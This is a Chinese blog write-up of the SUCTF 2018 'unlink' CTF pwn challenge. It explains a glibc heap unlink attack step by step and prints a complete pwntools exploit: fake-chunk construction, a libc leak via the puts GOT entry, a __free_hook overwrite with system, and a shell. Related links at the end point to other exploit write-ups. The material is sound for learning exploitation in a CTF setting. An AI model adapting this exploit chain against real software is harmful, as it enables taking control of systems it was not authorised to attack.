【pwn】[SUCTF 2018 招新赛]unlink --堆利用之unlink

于 2024-01-18 14:58:45 发布
阅读量1.4k 收藏 37
点赞数 30
文章标签: 网络安全 安全 python c语言 系统安全 安全架构 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/135674766
版权

先来看一下程序的保护情况

堆栈不可执行,而且还开了canary

看一下ida

又是经典菜单题,接着分析每一个函数功能就行

touch函数:有一个数组存malloc出来的地址

delete函数:删除堆中的数据,不存在uaf漏洞

show函数:打印堆中数据

take_note函数:向堆中写数据

分析到这里,根据题目的提示,那就用unlink来打,这里有篇博客可以先学习一下:【pwn学习】堆溢出(三)- Unlink和UAF_堆溢出 got表-CSDN博客

首先我们先创建三个堆块

debug看一下

再看看一下存堆地址的数组

接着我们来构造一个fake_chunk

首先我们来一步步看这个过程,我们payload是向第一个堆中写入数据,但是却溢出到了第二个堆中的数据,将第二个堆中的prevsize和size改了

图中第二个框就是第二个堆,可以看到presize和size已经被修改,之所以为什么这么改0x20,是因为是第二个堆地址-0x20确定第一个堆的地址,0x90是为了表示第一个堆已经被free了,触发unlink

,当我们delete(1)时就会将第一个chunk解链,这个过程就是要利用第一个堆的fd和bk指针,这个过程就是fd->bk=bk,bk->fd=fd,其实就是一个双向链表解链操作

我们来看这一步bk->fd=fd,我们知道前面的bk是buf-0x10,所以解链时我们就会到0x6020b中,找到bk_fd指针位置(其实就是距离0x6020b+0x10)的位置,将0x6020c0此处的地址复制成fd(这个fd是我们fakechunk中的fd,即0x6020a8),debug看一下

那这样有什么用呢?首先确定一点,这个地址的值已经被我们控制了,那就可以通过puts函数,将puts函数的地址打印出来,泄露出libc基址,然后将free的plt表修改成system函数,即可达到getshell目的

先来看一下exp:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io=process("./pwn")

elf=ELF("./pwn")

#io=remote("node4.anna.nssctf.cn",28319)

def debug():

    gdb.attach(io)

    pause()

def touch(size):

    io.recvuntil(b"please chooice :\n")

    io.sendline(str(1))

    io.recvuntil(b"please input the size : \n")

    io.sendline(str(size))

def delete(index):

    io.recvuntil(b"please chooice :\n")

    io.sendline(str(2))

    io.recvuntil(b"which node do you want to delete\n")

    io.sendline(str(index))

def show(index):

    io.recvuntil(b"please chooice :\n")

    io.sendline(str(3))

    io.recvuntil(b"want to show")

    io.sendline(str(index))

    io.recvuntil(b'is : ')

def take_note(index,content):

    io.sendlineafter(b'chooice :\n',b'4')

    io.sendlineafter(b'modify :\n',str(index).encode())

    io.sendafter(b'content\n',content)

touch(0x20)

touch(0x80)

touch(0x100)    

#debug()

buf=0x6020c0

#fake_chunk

prev_size=p64(0)

chunk_size=p64(0x20)

fd=buf-0x18

bk=buf-0x10

content=p64(fd)+p64(bk)

of_prev_size=p64(0x20)  

of_chunk_size=p64(0x90)

payload=prev_size+chunk_size+content+of_prev_size+of_chunk_size

take_note(0,payload)

delete(1)

debug()

payload=p64(0)*3+p64(0x6020c8)    

take_note(0,payload)             #这里其实是在向0x6020a8中写入数据了

payload=p64(elf.got['puts'])     

take_note(0,payload)            #这里是在向0x6020c8中写入数据

show(1)                                   #打印0x6020c8中的数据

puts_addr=u64(io.recvuntil(b'\x7f')[-6:]+b'\x00\x00')  

print(hex(puts_addr))

libc=ELF("./libc-2.23.so")

libc_base=puts_addr-libc.sym['puts']

free_hook=libc_base+libc.sym['__free_hook']

bin_sh_str=libc_base+next(libc.search(b'/bin/sh\x00'))

payload=p64(free_hook)+p64(bin_sh_str)

take_note(0,payload)

system=libc_base+libc.sym['system']

take_note(1,p64(system))

delete(2)

io.interactive()

GGb0mb
关注
  • 30
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
CTF之溢出-unlink原理探究
热门推荐
BadRer的博客
06-12 1万+
来干!来干! 转战溢出,这东东确实接触的很少,听说很神奇很细腻。我也是初次接触就和大家一起共同学习下,也填补下这方面的空白。 https://sploitfun.wordpress.com/2015/02/26/heap-overflow-using-unlink/ 这篇文章讲的就是溢出的原理,不过全是英文,估计。。。慢慢看,不急。我就结合着它给的示例程序来分析下原理,以及如何利用溢出。
CTF(pwn) 利用 之 unlink 介绍
半岛铁盒的博客
07-01 880
unlink是链表中常见的操作,而我们需要利用这个过程 通过改变链表指针,使中间块拿出来 当前的unlink会有一个对链表的完整性检查的 // 由于 P 已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致(size检查) if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \ malloc_printerr ("corrupted size vs. prev_size");
全面剖析Pwnable.kr unlink
Bill
08-10 2100
   最近一直在学习方面的知识,unlink是CTF中考察方面知识的重点.于是就拿一道简单的例题来剖析一下.方面的PWN对内存的分配和回收机制要求比较高,也是CTF中压轴题. 目录: 知识简介 漏洞分析 漏洞利用 Write Up及相关链接 知识简介: 为了节约内存,被使用之后的chunk和未使用的chunk的内存布局不相同,但是都用了相同的大小,于是free...
linux溢出学习之unsafe unlink
jmp esp
12-10 3322
示例代码来源:https://github.com/Escapingbug/how2heap/blob/master/unsafe_unlink.c#include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> uint64_t *chunk0_ptr;int main() { printf("We
linux内核pwn,浅谈Linux Pwn Unlink机制
weixin_31361715的博客
04-29 489
unlink溢出中的一种常见的利用形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。unlink对于最初接触的人来说机制比较难以理解,笔者会结合unlink的实现源码以及使用gdb调试对unlink进行阐述。unlink的触发当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否为空闲,如果为空闲则会将相邻的chunk与free的chunk进行...
pwn学习】溢出(三)- Unlink和UAF
Morphy_Amo的博客
01-21 1617
溢出中的unlink和UAF
CTF PWN之heap入门 unlink
L2329794714的博客
09-09 1627
unlink利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建块的流程实现),后面再创建两个相邻的块,后面一个大小大于0x80,再前一个块里伪造一个释放状态的chunk,并利用溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
我又pwn啦——理论篇 unlink
m0_64195960的博客
06-20 549
1)定义:在双向链表中取出一个chunk的操作2)使用时间:1、malloc·在恰好大小的large chunk处取chunk时·在比请求大小大的bin中取chunk时2、Free·后向合并,合并物理相邻低物理地址空闲chunk时·前向合并,合并物理相邻高物理地空闲chunk时(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地址空闲chunk时·前向合并,合并物理相邻高地址空闲chunk时(top chunk除外)4、realloc前向扩展,合并物理相邻高地址空闲
pwn | 知识】关于unlink的体会 [ZJCTF EasyHeap]
ethan18的博客
08-15 236
当进行unlink的时候,正如同它的名字,它是会被从这个链表中取出来的(unlink也就是取消自己的link状态了)主要的思路就是通过创建3个chunk,将第一个chunk通过edit函数来修改chunk内容和下一个chunk的头部,变成一个伪造的空闲chunk,然后free第2个chunk,这会导致第一个chunk被unlink。在我看来,unlink的原理是,当你free了一个chunk的时候,如果你的物理相邻的chunk如果是空闲状态,那么这个空闲的chunk就会被合并,形成一个更大的chunk。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
unlink 发生条件、过程演示 、如何利用
just do IT
07-19 673
文章目录发生条件:unlink 源码:演示 发生条件: unlink利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的块在物理上相邻时,会将他们合并,并将原来free的块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。 unlink 源码: #define bin_at(m, i) \ (mbinptr) (((char *) ...
unlink函数_PWN-浅析unlink
weixin_39522103的博客
12-11 682
my blog:http://www.pwn4fun.com/About the unlinkunlink,在CTF中是比较常见的知识点。What’s the unlinkunlink_chunk函数用于将空闲的chunk从所在的bin中取出( 把一个双向链表中的空闲块拿出来),可以使用下图描述。可能触发unlink的情形:malloc_consolidate()函数将fastbin中的空闲chu...
漏洞-unlink
m0_52343643的博客
04-06 444
当一个块(非fastbin)释放时,libc会先看其相邻的块是否空闲,空闲的话就将这个相邻块从bins中取出,并与当前释放块合并,而这个bins中取出块的过程就是unlink
溢出个人学习总结
snowleopard_bin的博客
08-01 4914
Unlink ctf wiki中有个地方困扰了我很久: // fd bk if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); ...
Pwn Unlink攻击技术原理以及例题
最新发布
红叶的博客
12-17 1021
现在有这么三个chunk,其中我们已经构造好了Unlink的Payload。乍一看可能有点一头雾水,那么如果我们把这段看成一个chunk结构体呢?反之,另一个也是这个道理。glibc 2.23中的unlink宏源码是这样的。,这段恰好满足我们的unlink需求。,也就是我们的fake_chunk。,我们直接查看这个fd指向了哪里。,P是fake_chunk,也就是。这题的块指针位于bss段内,是。P是fake_chunk,即可获得我们的fd和bk。complete,或者说。指向的都是同一个地方。
unlink pwn
08-25
在计算机安全领域,"unlink"是一种常见的溢出攻击利用技术。它利用了"Use-After-Free"漏洞,该漏洞在释放内存后仍然使用该内存的指针。 在具体的实现中,"unlink"攻击需要使用全局变量,并进行多次写入。攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值